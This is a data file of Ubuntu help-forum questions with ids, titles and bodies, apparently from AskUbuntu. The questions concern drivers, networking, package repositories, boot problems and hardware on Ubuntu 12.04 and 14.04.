506763	nvidia x server settings error , ubuntu 14.04	i am using dell precission m6700 . it has dual video cards nvidia optimus . intel with nvidia . currently i am using intel 4000 , but i wanted to change it to nvidia and i received this error window from nvidia x server settings . how could i resolve this error ? is there any error log ? maybe i can to reinstall this ? btw i am using 14.04 . this is the image of an error .
506764	how to find dns servers that dnsmasq is pointing to	i can not find a list of dns servers that dnsmasq is pointing to . nm-tool only gives the internal `` dns : 192.168.1.1 '' i want the upstream external dns servers that this is pointing to . i am on xubuntu 14.04 , default network manager install . thanks
506766	firefox - error : can not open display : :0.0	i 'm trying to run xvfb alongside cutycapt to take screenshots of websites on a headless vps server . i 've installed xorg , firefox latest stable release , and cutycapt . i 've set the default display by running export display=:0.0 when i run firefox in terminal i get : ( process:13102 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed error : can not open display : :0.0 i 've read every other question/answer about this on google and ca n't find a solution . what other things should i be checking/trying ?
506770	script runs program instead of just running script	i want to make a script to run the following command with a double click . my script is : cpufreq-selector -c 4 -g performance manually running it in terminal is fine but if i use a .sh file it opens up the cpufreq-selector software
506771	no wireless connection in newly installed ubuntu	i just installed ubuntu on my machine and there is no wireless connection . i mean , the wireless card wo n't even show at the top pane of my desktop . i might also add that whenever the ubuntu launches , a moment before i get the login screen , there are three lines that says : error ... something ... something ... wireless ... go to www.kernel ... something ... i do n't know the exact words in the errors , because it vanishes a second after it appears , and it 's too fast for me to read . i saw a couple of posts here with the same problem , but the answers were not relevant to my situation ... i there a command that can detect my wirless card specification so i can look for a driver ? or better yet , is there a command that can download the necessary drivers for the wireless card ? here are the results for ifconfig : eth0 link encap : ethernet hwaddr 88 : ae:1d:33:93 : b0 inet addr:10.0.0.5 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :8aae:1dff : fe33:93b0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3539 errors:0 dropped:0 overruns:0 frame:0 tx packets:2922 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3317067 ( 3.3 mb ) tx bytes:332509 ( 332.5 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1119 errors:0 dropped:0 overruns:0 frame:0 tx packets:1119 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:110448 ( 110.4 kb ) tx bytes:110448 ( 110.4 kb ) if anymore information is needed , tell me . please , this is very important to me , i have a project due next week , and i can not do it without wireless ( i 'm connected through wired connection right now ) . edit : here 's some more information that might help , lspci -nn | grep 0280 gives : 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
506774	usb ports fail to `` enumerate ' usb devices	ubuntu 12.04 lts my mouse stopped working . all other mice tested in same port were n't working either so i opened tty1 to do some diagnostics and saw ... aug 4 15:14:30 harveyp kernel : [ 774.268097 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 aug 4 15:14:30 harveyp kernel : [ 774.780050 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 scrolling up the screen . i disconnected all usb devices and tested the mouse in each port successively . the mouse is now installed in the usb port at the front which seems to be the only one that works . the other 4 ports on the back of the box all give ... aug 4 15:14:30 harveyp kernel : [ 774.196041 ] usb 3-1 : new low-speed usb device number 90 using ohci_hcd aug 4 15:14:30 harveyp kernel : [ 774.268097 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 aug 4 15:14:30 harveyp kernel : [ 774.780050 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 in /var/log/syslog with a new ohci_hcd entry every few minutes after about a dozen of the other message . ports 1,2,3 are all referred to as i change the port one , by one . $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 092 : id 1241:1166 belkin mi-2150 trust mouse i use one port for sd card reader , and another for my ancient zip100 . and it is useful to have the port at the front for usb flash-drives rather than grubbing around at the back each time . so i need this sorting . there seems to have been no apparent causative event ... looking forward to your help , thanks ! harvey ps my screen display is ever in 'laptop ' mode . how do i change that to 'desktop ' mode ?
506776	how to skip entering password for sudo i.e . prepare script with permissions ?	for work and other situations as well i 'm running all sorts of sudo commands . thank god ( and devs ) , they can be run from unity laucher : ) . but as a lazy timesaver i want these commands permanently allowed to proceed without typing the password over and over . can it be done ? examples : ./serveron and ./serveroff which are simply scripts that will run / stop apache2 and mysql . sudo sysctl -w vm.drop_caches=3 ; sudo sync & & echo 3 | sudo tee /proc/sys/vm/drop_cache which will free up the ram as i 've found somewhere .
506777	how to run apache cgi with a different user ?	i am trying to get backuppc interface to work , i changed the user apache2 to the one i need ( from www-data ) but cgi is not working . i get this error [ cgid : error ] [ pid 18415 : tid 140722680162176 ] ( 13 ) permission denied : ah01241 : exec of '/usr/share/backuppc/cgi-bin/index.cgi ' failed
506778	deleted elements that i do n't know	in order to install a new version of skype , i did sudo apt-get -force remove skype sudo apt-get autoremove this deleted lots of elements on my laptop and i do n't know if they are important . can you help me please ? here is the list of the elements that i have deleted ( first page , second page ) :
506782	apt-get package not found for local repository	i setup a local repository for a few packages . here is the directory structure of the repository : dists dists/precise dists/precise/main dists/precise/main/binary-amd64 dists/precise/main/binary-amd64/python-openvswitch_2.1.2-51_all.deb dists/precise/main/binary-amd64/packages.bz2 dists/precise/main/binary-amd64/packages dists/precise/main/binary-amd64/packages.gz dists/precise/main/binary-amd64/openvswitch-switch_2.1.2-51_amd64.deb dists/precise/main/binary-amd64/openvswitch-datapath-dkms_2.1.2-51_all.deb dists/precise/main/binary-amd64/release dists/precise/main/binary-amd64/openvswitch-common_2.1.2-51_amd64.deb the /etc/apt/sources.list has the following entry : deb http : //archive.ubuntu.com//ubuntu precise main restricted universe multiverse deb http : //archive.ubuntu.com//ubuntu precise-updates main restricted universe multiverse deb http : //archive.ubuntu.com//ubuntu precise-security main restricted universe multiverse deb http : //repo1 precise main sudo apt-get update ign http : //repo1 precise release.gpg ign http : //repo1 precise release ign http : //repo1 precise/main amd64 packages/diffindex ign http : //repo1 precise/main translationindex hit http : //repo1 precise/main amd64 packages ign http : //repo1 precise/main translation-en_us ign http : //repo1 precise/main translation-en hit http : //archive.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-updates release.gpg hit http : //archive.ubuntu.com precise-security release.gpg hit http : //archive.ubuntu.com precise release hit http : //ubuntu-cloud.archive.canonical.com precise-updates/cloud-tools release.gpg hit http : //archive.ubuntu.com precise-updates release hit http : //archive.ubuntu.com precise-security release hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //ubuntu-cloud.archive.canonical.com precise-updates/cloud-tools release hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages hit http : //ubuntu-cloud.archive.canonical.com precise-updates/cloud-tools/main amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex ign http : //ubuntu-cloud.archive.canonical.com precise-updates/cloud-tools/main translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex hit http : //archive.ubuntu.com precise-updates/main amd64 packages hit http : //archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //archive.ubuntu.com precise-updates/universe amd64 packages hit http : //archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise-security/main amd64 packages hit http : //archive.ubuntu.com precise-security/restricted amd64 packages hit http : //archive.ubuntu.com precise-security/universe amd64 packages hit http : //archive.ubuntu.com precise-security/multiverse amd64 packages hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en ign http : //ubuntu-cloud.archive.canonical.com precise-updates/cloud-tools/main translation-en_us hit http : //archive.ubuntu.com precise/multiverse translation-en ign http : //ubuntu-cloud.archive.canonical.com precise-updates/cloud-tools/main translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en reading package lists ... done try apt-get install : sudo apt-get install python-openvswitch reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-openvswitch any tips on debugging the above problem ? solution : i ended up creating a trivial repository structure to get it working : this is the new structure : dists dists/python-openvswitch_2.1.2-51_all.deb dists/packages.bz2 dists/packages dists/packages.gz dists/openvswitch-switch_2.1.2-51_amd64.deb dists/openvswitch-datapath-dkms_2.1.2-51_all.deb dists/openvswitch-common_2.1.2-51_amd64.deb the /etc/apt/sources.list has the following entry : deb http : //repo1/dists / now i am able to do apt-get update followed by apt-get install openvswitch-common
506786	used up software linux downloads folder ?	i`ve been using linux for four month . mint qiana , peppermint 3 , lubuntu14.04.1 . when i set up my printer , i downloaded the following : cupswrapperhl2270dw-2.0.4-2.i386.deb -- archive brother-hl-2170w-hpijs-pcl5e.ppd -- text hl2270dwlpr-2.1.0-1.i386.deb -- archive my printer may be using these files when printing or have already use them in some manner . these files are designated type : archive . do these files have to be permanently in the downloads folder ? are they being used by the os where they currently reside or are they remnants from the installation and can be removed/deleted because they have already been incorporated within my printer setup ? if these .deb files are being used , where should they normally be placed other than the downloads folder or is the downloads folder the only place to keep these files so they can be used to print ? if these files must be kept , how would i safely relocated them from the downloads folder and place them in the normal file system so that they remain functional for printing ? regarding the brother ppd.text file : this file was also sent to the printer software interface and is being used . can this file be safety removed ? i 'm not 100 % sure i can remove it without rendering my printer setup relegated to become useless ? here again , the same above questions apply , only in this case regarding this particular text file . to answer my own questions , i 'm guessing the answer to be : the ppdtext/.deb files : ok to delete them , os software has stored-saved them in some form and has completed using them . these are remnants and will not effect your printer/other interface/operation if you delete/permanently remove them .
506787	unable to add ppa	i was just trying to get pipelight installed when i came across following error . i copy and pasted the input into my terminal the second time around and the error still occured .
506789	the ubuntu graphics catch 22	trying to use a live dvd to run ubuntu 14.04.1 , i get the `` monitor signal out of range '' error . i hit ctrl-alt-f1 to bring up the command line . i do sudo nano /etc/default/grub and remove # from grub_gfxmode and change it to 1280x1024 and overwrite the file . i then sudo update-grub and get : /usr/sbin/grub-probe : error : failed to get canonical path of /cow . i find that i could start in safe graphics mode , but that is n't available on live dvd . i try to install it normally , but i ca n't see anything beyond the install screen when to move along the installation .
506790	some apps/popups displayed in gnome-style in ubuntu 14.04 ( unity )	after installing valama , some dialogs ( open-dialog , save-dialog , password-prompt , ... ) , are displayed in gnome-style ( no title-bar ) . this issue appears in any application using gnome-dialogs ( i.g . gedit ) does anyone know how to fix that ? thank you !
506792	unable to open ubuntu after installation on sony vaio	i had windows 8 64 bit preinstalled on sony vaio model : svf15213snb . i then booted from the ubuntu 14.04 usb drive and i created root , home , swap out of a 20 gb partition . on restart it then showed grub where i chose the windows 8 to boot into , i then restarted but this time grub did n't load and windows 8 automatically started . i then tried to reinstall ubuntu and during the setup it showed that i already had ubuntu 14.04 installed on the system . i chose the option `` replace ubuntu 14.04 lts with ubuntu 14.04 lts '' hence removing the old ubuntu installation and replace it with a new installation . after the installation grub didnt load and it automatically booted ubuntu 14.04 . there i saw that the whole hard disk had been formatted and the new installation covered all of it . now another problem came up and the problem is that the new installation of ubuntu cant start and it repeatedly shows the sony vaio care rescue mode where i am stuck and i can neither install windows nor remove ubuntu . please help
506793	is it safe to upgrade wubi install from 12.04lts to 14.04lts ?	i have 12.04lts installed in wubi and want to know if and how i can upgrade to 14.04lts . i do not want a new installation , as that would totally disrupt my current activities and programming .
506798	eclipse java ide 4.4 does not have the org.eclipse.pde.ui.pluginimportwizard ?	i have just installed eclipse java ide 4.4 on ubuntu 12.04 lts . in the welcome screen i clicked `` create a hello world swt application '' under java development . under import the swt project i clicked `` click to perform '' but instead of importing the project it showed this error message : problem occurred ( - ) the command did not complete sucessfully [ < < details ] [ ok ] unknown wizard : org.eclipse.pde.ui.pluginimportwizard
506799	how to get rid of chromiumos	i tried to install chromiumos in ubuntu , didnt work out , and now when i do sudo apt-get upgrade i got this : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up lightdm-login-chromiumos ( 1.0 ) ... % total % received % xferd average speed time time time current dload upload total spent left speed 100 6 0 6 0 0 26 0 -- : -- : -- -- : -- : -- -- : -- : -- 26 downloading : http : //commondatastorage.googleapis.com/chromium-browser-snapshots/linux_chromiumos/287303/chrome-linux.zip zip : /tmp/filemltjzc.zip warning : illegal date format for -z , -- timecond ( and not a file name ) . warning : disabling time condition . see curl_getdate ( 3 ) for valid date syntax . % total % received % xferd average speed time time time current dload upload total spent left speed 100 127 100 127 0 0 238 0 -- : -- : -- -- : -- : -- -- : -- : -- 237 archive : /tmp/filemltjzc.zip end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . unzip : can not find zipfile directory in one of /tmp/filemltjzc.zip or /tmp/filemltjzc.zip.zip , and can not find /tmp/filemltjzc.zip.zip , period . dpkg : error processing package lightdm-login-chromiumos ( -- configure ) : subprocess installed post-installation script returned error exit status 9 errors were encountered while processing : lightdm-login-chromiumos e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how to get rid of it ?
506801	strange error when booting lubuntu 14.04	when i boot up my computer it shows the bios then when it boots up the screen turns black then 20 seconds later the error says : [ 20.43.60.56 ] via-ircc 0000:00:11.0 : device not available ( cant reserve [ io 0x4000-0x407f ] ) then boots up normally . do you know what happened ?
506806	how to make faster first search at unity-dash ? way slower than second one	after a reboot , first searching at unity dash will be slower than the second search , on my system at least . i guess this is because file index is cleared after a reboot and recreated as soon as first unity dash search is done . if this is the case , auto-recreating index at system start-up should work i 'm interested particularly in searching for programs . i have disabled online search for better performance while no interest in that .
506808	how to install older version of jenkins ?	i 'm installing jenkins 1.532-1.1 on ubuntu 12.04 , and i need to install it using apt-get repo . i ran following three commands which installs latest jenkins just fine : wget -q -o - http : //pkg.jenkins-ci.org/debian/jenkins-ci.org.key | apt-key add - echo `` deb http : //pkg.jenkins-ci.org/debian binary/ '' > > /etc/apt/sources.list apt-get update but i need to install this specific version 1.532-1.1 ( for a reason that is beyond my control ) . i tried apt-get install jenkins=1.532-1.1 , this gives version not found error . i 've had a look at this link http : //pkg.jenkins-ci.org/debian/ but installing *.deb is not option for me . any idea how i can install jenkins 1.532-1.1 using apt-get ? since apt-get wraps dpkg , is there any way to work on .deb file & make this command , apt-get install jenkins=1.532-1.1 work .
506809	number lock light remains on after shutting down computer	if the num lock key active light is lit , on closing down the pc using the top bar menu option shut down ... the light on the keyboard remains lit . if the num lock key is depressed before closing down ( the light extinguishes ) and then closed down , all is well with the world . the keyboard is a pretty much standard ( if ancient ) logitech internet pro keyboard which has worked fine on prior owned pc 's running windoze xp . the pc is totally dedicated to ubuntu and was installed from scratch on first use fairly recently . no lights remain on the pc after close down . there is a not easily accessible switch underneath the machine which removes all power from the psu . the system specs : ubuntu 14.04 64 bit 3.7 gb ram intel celeron ( r ) 847 @ 1.1 ghz x 2 intel sandybridge mobile 730+gb hdd it 's no big deal , but just curious as to why this might be the case .
506810	laptop overheats with ubuntu 14.04 while stay cool with windows 7	i have an asus n53sn laptop . it has both nvidia and intel integrated gpu . i am using nvidia-prime with restricted drivers . when idle , heat levels stay low , but whenever i watch a movie or youtube , heat rises to 78-80째c in both gpu 's . in windows i only get maximum 60째c .
506812	ca n't exec âlocaleâ : no such file or directory	i am new to linux . i tried today to install steam on my ubuntu 14.04 64-bit through the .deb from the steam website . on launch , steam gave me the following error : `` you are missing the following 32-bit libraries , and steam may not run : libc.so.6 '' i tried to follow a few tutorials online , i will update when i find them again , and installed a some different 32-bit libraries . now i get this error each time i try to use apt-get or even open the software center . installarchives ( ) failed : ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17. dpkg : warning : 'ldconfig ' not found in path or not executable dpkg : error : 1 expected program not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin error in function : what should i do ? update : this is the installation i followed , which produced a dangerous warning at one point : sudo apt-get install libc-bin : i386
506816	port 80 apparently closed ubuntu 14.04	i 'm installing a small server on the company where i work . i go to whatsmyip.org and it tells me it is 190.124.165.35 . when i go to canyouseeme.org it tells me that the connection timed out for port 80 . i already disabled ufw . the scenario inside my company is this one : i have this pc with ubuntu 14.04 and i finished installing lamp on it . this computer does n't have the actual ip address . the ip address of this computer is an internal ip address from the company . my boss uses watchguard firewall and he did some rerouting so that when you enter 190.124.165.35 to your browser , it redirects you to the internal ip assigned to this computer and you can view the web app . is there any extra configuration i need to do on the server to be able to view this ? edit running netstat -nlt results in : netstat -nlt active internet connections ( only servers ) proto recv-q send-q local address foreign address state tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen tcp6 0 0 : :1:631 : : : * listen tcp6 0 0 : ::80 : : : * listen
506817	public directory ( $ xdg_publicshare_dir ) created despite `` enabled=false '' in user-dirs.conf	i 've set `` enabled=false '' in my /etc/xdg/user-dirs.conf which , according to comments in that file , and also according to the spec , should stop xdg-user-dirs-update from running at login time and thus also from recreating any missing $ xdg_*_dir directories . additionally , i 've commented out the definition of xdg_publicshare_dir in my user 's ~/.config/user-dirs.dirs due to not being able to decide where to point it at for now . despite xdg-user-dirs-update being disabled , a directory named `` public '' reappears in my user 's home directory at every login . what is causing this and how can i stop the unwanted public directory from appearing ? i 've found an old red hat bug referencing a similar issue , but it 's closed without a known fix . the issue does n't occur for $ xdg_templates_dir which i 've similarly commented out .
506819	resolution not recognized in ubuntu 14.04	my 1920x1080 resolution is n't recognized in my fresh ubuntu 14.04 installation the maximum is 1152x864 . i use an nvidia gtx 660 .
506820	is this ubuntu 14.04.1-desktop-i386.iso the correct version to download ?	how to switch from linux mint 9 isadora to ubuntu 14.04.1-desktop-i386.iso . i do not have a cd . i have a acer netbook with usb . is this ubuntu 14.04.1-desktop-i386.iso the correct version to download ? i am new to ubuntu . thanks !
506823	getting error downloading java programmer	e : failed to fetch ftp : //ftp.iitb.ac.in/os/ubuntu/archives/pool/main/o/openjdk-7/icedtea-7-jre-jamvm_7u55-2.4.7-1ubuntu1_amd64.deb unable to fetch file , server said 'failed to open file. ' e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i got this error while writing the following commnad : sudo apt-get install openjdk-7-jdk i do n't have any is idea why , i am very new to ubuntu , please answer in simple language .
506824	nm-applet does not work ubuntu 14.04	the network manager 'nm-applet ' has disappeared from the unity panel of my ubuntu 14.04 . when i try to run it from the commad line , i receive an error : $ nm-applet nm-applet-message : using fallback from indicator to gtkstatusicon ( nm-applet:6409 ) : nm-applet-warning ** : could not find shellversion property on org.gnome.shell after 5 tries i do not know if it is directly related but ever since this , running system settings- > network does not display 'mobile broadband ' even though the datacard is connected to the system . the datacard does not work any more . edit : the following command as suggested by user 'mkayaalp ' also gives an error : $ nm-applet -- shell-debug nm-applet-message : using fallback from indicator to gtkstatusicon ( nm-applet:6848 ) : nm-applet-warning ** : could not find shellversion property on org.gnome.shell after 5 tries cnm-applet-message : pid 0 ( we are 6848 ) sent signal 2 , shutting down ... ( nm-applet:6848 ) : glib-critical ** : source id 107 was not found when attempting to remove it edit2 : the problem of the icon for 'nm-applet ' not appearing on the unity panel is not unique to it . this problem also persists for 'psensors ' even though in options it is set to show on the unity panel . p.s . searching on google and on askubuntu.com mainly brings up results regarding lubuntu 14.04
506826	asus laptop touchpad not working	i am using asus x450la and ubuntu 14.04 . i installed ubuntu last day . but i am facing problem with touchpad . it is not working and pointer is not visible too . i am using a mouse . i searched google a lot and also in this group but nothing worked for me . how can i solve this problem ? ? ? please help me ...
506828	terminal command for gthumb image viewer	i have these two graphics applications . in my control panel , their names are listed as gthumb and image viewer . gthumb has too many features for my taste , so i normally use image viewer , which displays one image at a time and does not show the directory tree . since image viewer has the same icon and gui , i think it is just a minimalist version of gthumb . in terminal , gthumb is the command for gthumb . what is the command for image viewer ?
506830	parport scanners	i have an old canon n640 p ex scanner , that uses parport to connect . i have installed sane and xsane . i have also enabled canon_pp , after that i have also run sane-find-scanner , but it says : # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . i have tried to search also with xsane , but it also detects no scanners .
506832	14.04 ( installed in macbook air ) does n't detect second monitor	i have 14.04 installed in a macbook air 2011 os x mavericks . in ubuntu the `` displays '' window does not detect a second monitor flatron l1953s ( which otherwise works ok in the os x ) . in that ubuntu 's `` displays '' window , there appears only a image for the `` built-in display '' . changing the resolution does not solve it . in case it is of help for this problem , this is some information of the system : ~ $ sudo dmidecode -s system-product-name macbookair5,2 ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ~ $ lspci -vnn | grep -i vga -a 12 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : apple inc. device [ 106b:00fe ] flags : bus master , fast devsel , latency 0 , irq 46 memory at a0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at 90000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 2000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : intel corporation device [ 8086:7270 ] flags : bus master , medium devsel , latency 0 , irq 43 on the other hand , the ubuntu 's `` additional drivers '' window does not contain anything related to monitor or graphics . ( on the contrary , ubuntu 14.04 installed in a windows vista fujitsu amilo detects correctly the same monitor ) . thanks a lot , ps : $ sudo xrandr screen 0 : minimum 8 x 8 , current 1440 x 900 , maximum 32767 x 32767 edp1 connected primary 1440x900+0+0 ( normal left inverted right x axis y axis ) 286mm x 179mm 1440x900 59.8*+ 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) information about intel graphics i915 : root @ ... # for i in /sys/module/i915/parameters/* ; do echo $ { i } =cat $ i ; done /sys/module/i915/parameters/disable_power_well=1 /sys/module/i915/parameters/enable_hangcheck=y /sys/module/i915/parameters/enable_ips=1 /sys/module/i915/parameters/enable_pc8=1 /sys/module/i915/parameters/enable_psr=0 /sys/module/i915/parameters/fastboot=n /sys/module/i915/parameters/fbpercrtc=0 /sys/module/i915/parameters/i915_enable_fbc=-1 /sys/module/i915/parameters/i915_enable_ppgtt=-1 /sys/module/i915/parameters/i915_enable_rc6=-1 /sys/module/i915/parameters/invert_brightness=0 /sys/module/i915/parameters/lvds_channel_mode=0 /sys/module/i915/parameters/lvds_downclock=0 /sys/module/i915/parameters/lvds_use_ssc=-1 /sys/module/i915/parameters/modeset=-1 /sys/module/i915/parameters/panel_ignore_lid=1 /sys/module/i915/parameters/pc8_timeout=5000 /sys/module/i915/parameters/powersave=1 /sys/module/i915/parameters/prefault_disable=n /sys/module/i915/parameters/preliminary_hw_support=1 /sys/module/i915/parameters/reset=y /sys/module/i915/parameters/semaphores=-1 /sys/module/i915/parameters/vbt_sdvo_panel_type=-1
506834	lxc is it possible to run a 12.04 container on 14.04	other than the kernel only , is it possible to emulate an older install of ubuntu ? i looked in /usr/share/lxc/templates and it only has `` lxc-ubuntu '' .
506839	14.04 install problems : best to reinstall ?	question : my first-time ubuntu install is still not working . is it best just to reinstall and pay more attention ? background after discovering the recovery option for 'rescan grub stuff ' ( or similar ) i 've been able to restore my access to data etc on windows . my windows was completely unaccessible , so that was very nerve-racking . but i 've got a small list of other problems getting ubuntu to work . primarily , the default 'ubuntu ' userid password is no longer the empty string ( i.e . just press the enter key ) . also , i have no other userids available except the `` guest login '' , which is not helpful to fixing things . should i be concerned i have no other userids active ? did i miss a step in the install ? i came back at one point and my screen had greyed-out and now i do n't remember specifically what happened . i know i was able to get in and use user=ubuntu for a while , but while running various grub repairs that and other things stopped working . so , i 'm leaning to reinstalling ubuntu while avoiding a greyed-out screen . can i do that without uninstalling ? is that likely to help ? or do is there an un-installer i need to run ? thanks for any input . edit installed from a 14.04 install dvd . my laptop was not a dual-boot , but the grub installer seems to now allow me to dual-boot . it is a bios machine running windows 7 . i 'm certain i did not deliberately make a userid . no other usernames appear as options where i get the ubutnu or guest login option .
506846	unable to login after deleting guest user account	i was trying to tweak ubuntu after fresh installation and following various links on web stating `` things to do after installing ubuntu 14.04 '' i was trying to remove guest user account from the start screen and was following some text in the command prompt . i can recall only few : sudo gedit /lightdm/lightdm.conf and to add below line at the end of already written lines ( but it was blank , still i added and saved it ) . ( in the document ( looked like advance notepad : p ) which just opened using above piece of code ) 3 . greeter remote-login=false and then reboot . but here comes the problem . machine is booting up normally , ubuntu on purple is coming ... . dots below ubuntu ticking ... . and then black screen ... .. i guess i 've deleted both accounts ( mine & guest ) ? now it has no entry to let me in . is there any option to fix it or to get access via a new user account ? i do have a live usb with me . can it help ? update : i tried to boot in root prompt while holding shift ( when ubuntu was booting ) and try to edit sudo nano /etc/lightdm/lightdm.conf it was showing only one line it i.e . greeter-show-remote-login=false when i try to edit & save it with [ seatdefaults ] it was showing no write permission .
506847	all print jobs processing indefinately hp office jet pro	i have an hp office jet pro to which i am trying to network print . all jobs that i send to it never print and if i check with the document print status window , the status is listed as processing . i could print things about a year ago but not any more . things i have tried : restarting my computer . restarting the printer . checking to make sure i have the right ip address . pinging the printer 's ip address . that does work . trying to `` add '' the printer a second time . i have ensured that , under printer policies , the `` enabled '' check box is checked . i tried setting up printing from a windows virtual box inside my ubuntu machine . i was able to print part of a test page , though it also gave me an error message . i will add that my office mates are able to print to this computer using different computers . i can however print to other printers on my network . any suggestions ?
506853	having trouble upgrading from ubuntu 12.04 lts to 14.04 lts	i am still relatively a newbie working with ubuntu , and my current setup is having issues . i am currently running ubuntu 12.04 lts , 32-bit , a dual-boot system with windows xp 64 bit , 2.9 gib , intel core 2 , geforce 9600 , 577.8 gb . my system often ( at least 2-3 times a day ) crashes and restarts . when it crashes , the mouse and the keyboard do not work , and if audio is playing it will skip for about 30 secs until the computer restarts . i 've been working on the crashing problem for a while now , with little success . in any case , at this point i would prefer to just upgrade to 14.04.1 lts to see if that helps . update manager is not notifying me of any new lts releases , so i am trying to upgrade via terminal . but when i run : sudo apt-get update sudo apt-get dist-upgrade sudo do-release-upgrade -d an error occurs with the update . here is the last bit of what the terminal says : ign http : //archive.canonical.com trusty-proposed/partner translation-en ... fetched 0 b in 0s ( 0 b/s ) error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty-backports/partner/source/sources ... restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done === command detached from window ( mon aug 4 12:28:37 2014 ) === === command terminated with exit status 1 ( mon aug 4 12:28:37 2014 ) === what would be the best next step after this ? my internet connection is fine while browsing for solutions to the problem , so how could it be a network problem ? i 've tried this command a few times over the past couple of days , and i always have the same result . i 've also tried sudo do-release-upgrade -p , and the results seem identical . also , for the crashing problem , i also wonder if part of the problem is that my ubuntu system is 32 bit and my windows xp system is 64bit . is there a way to update to ubuntu 14.04.1 64bit without having to do a clean install ? thanks in advance !
506855	dark menu item on dark menu background	i recently decided to go back to ubuntu 's default `` ambiance '' theme in unity , but doing so resulted in dark text on dark menus ( like the one in the attachment ) , which i find hard to read ! this only happens with menus in the menu bar ; my context menus are fine . how can i fix this ?
506857	galaxy s2 ubuntu os	how can i make calls and sms on galaxy s2 with ubuntu os work ? is ubuntu os dead for galaxy s2 ? thanks very much in advance .
